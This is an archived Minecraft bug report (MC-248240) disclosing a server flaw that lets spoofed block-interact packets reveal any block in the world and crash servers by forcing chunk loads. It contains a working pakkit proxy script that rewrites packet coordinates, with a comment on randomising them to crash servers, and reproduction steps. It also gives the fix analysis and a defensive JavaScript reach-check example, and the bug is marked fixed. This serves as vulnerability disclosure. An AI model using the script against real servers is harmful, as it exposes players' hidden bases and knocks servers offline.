Mojira Archive
MC-248240

Arbitrary block fetching

Description

By modifying outgoing block interact packets with a proxy like pakkit (or creating our own with a mod), we can get information on any block in the world. Not only can this be used to find bases on competitive servers by enumerating over coordinates and looking for player-placed blocks, but it can also be abused to crash servers, because the server will load (and possibly generate) the chunk in order to get the block at the clicked position.

Reproduction steps

  • Connect to a vanilla server while proxied through pakkit.
  • Go to the pakkit scripting tab and enable a script similar to this:

    // Rewrites the location of every outgoing block_place packet before forwarding it to the server.
    exports.upstreamHandler = function (meta, data, server, client) {
      if (meta.name === 'block_place') {
        data.location = {
          x: 100000, // For the crash issue, replace with some kind of random large number generator, e.g. Math.floor(Math.random() * 1000000)
          y: 100,
          z: 100000
        };
      }
      server.sendPacket(meta, data);
    };

    // Server-to-client packets are forwarded unchanged.
    exports.downstreamHandler = function (meta, data, server, client) {
      client.sendPacket(meta, data);
    };

  • Right-click on the ground, or spam right-click in order to crash the server.

Alternatively, you could use pakkit's "edit and resend packet" function or create a mod that sends these packets.

I've created an unlisted YouTube video, demonstrating how this can be used to leak blocks (I placed a diamond block surrounded by air at 1000000, 64, 0), and demonstrating how this can be used to crash servers: https://www.youtube.com/watch?v=9ZmNhjKL6xU

Unfortunately, this issue already seems to be "public knowledge" and is getting exploited actively on realms, vanilla and spigot servers (probably fabric too?).

Code analysis

In the ServerGamePacketListenerImpl#handleUseItemOn method, the block update packet is always sent, even if the block is out of range. The simplest solution would be either to move the packet sending inside the distance check, or to exit early if the interacted block is out of range, which is what Paper seems to be doing (and CraftBukkit attempts to do).
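The mitigation the code analysis describes, a reach check that rejects the interaction before any chunk is loaded and before any block-update reply is sent, written here as an added example in plain JavaScript. It is not Mojang's, Paper's or pakkit's code; the reach limit, the player record shape, the loadChunk callback and the per-player rejection counter are assumptions made for illustration.

```javascript
// Added example (not from the report): server-side validation of a use-item-on
// packet. Assumed shapes: player = {x, y, z, eyeHeight}, packet.location = {x, y, z},
// loadChunk(chunkX, chunkZ) returns the chunk or null, stats is a per-player object.
const MAX_REACH_SQ = 6 * 6;           // assumed reach limit of 6 blocks, squared to avoid sqrt
const REJECTIONS_BEFORE_ALERT = 20;   // assumed threshold for flagging a player in logs

function distanceSqToBlock(player, loc) {
  // Measure from the player's eye position to the centre of the clicked block.
  const dx = player.x - (loc.x + 0.5);
  const dy = player.y + player.eyeHeight - (loc.y + 0.5);
  const dz = player.z - (loc.z + 0.5);
  return dx * dx + dy * dy + dz * dz;
}

function isWithinReach(player, loc) {
  return distanceSqToBlock(player, loc) <= MAX_REACH_SQ;
}

// Returns one of: 'malformed', 'rejected', 'rejected-alert', 'accepted', 'no-chunk'.
// loadChunk is only called after the reach check passes, so coordinates far from
// the player can neither load or generate a chunk nor trigger a block-update reply.
function handleUseItemOn(player, packet, loadChunk, stats) {
  const loc = packet && packet.location;
  if (!loc || !Number.isFinite(loc.x) || !Number.isFinite(loc.y) || !Number.isFinite(loc.z)) {
    return 'malformed';
  }
  if (!isWithinReach(player, loc)) {
    stats.rejected = (stats.rejected || 0) + 1;
    // Detection signal: a burst of out-of-range interactions from one player is worth logging.
    return stats.rejected >= REJECTIONS_BEFORE_ALERT ? 'rejected-alert' : 'rejected';
  }
  const chunk = loadChunk(loc.x >> 4, loc.z >> 4);
  return chunk ? 'accepted' : 'no-chunk';
}

// Stand-alone demo with constructed input: one nearby click and one remote click.
function demo() {
  const player = { x: 0, y: 64, z: 0, eyeHeight: 1.62 };
  const loads = [];
  const loadChunk = (cx, cz) => { loads.push([cx, cz]); return {}; };
  const stats = {};
  const near = handleUseItemOn(player, { location: { x: 2, y: 63, z: 1 } }, loadChunk, stats);
  const far = handleUseItemOn(player, { location: { x: 100000, y: 100, z: 100000 } }, loadChunk, stats);
  console.log(near, far, 'chunk loads:', loads.length); // accepted rejected chunk loads: 1
  return { near, far, loads: loads.length };
}

demo();
```

The check runs before any world access, which is the ordering the analysis recommends; the rejection counter gives operators a cheap signal to log without changing the protocol.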


Fixed

Noah van der Aa

[Mojang] Panda

2022-01-24, 01:12 PM

2022-02-09, 01:23 PM

2022-02-09, 01:23 PM

0

1

Plausible

Important

Networking

1.18.1, 22w03a

22w06a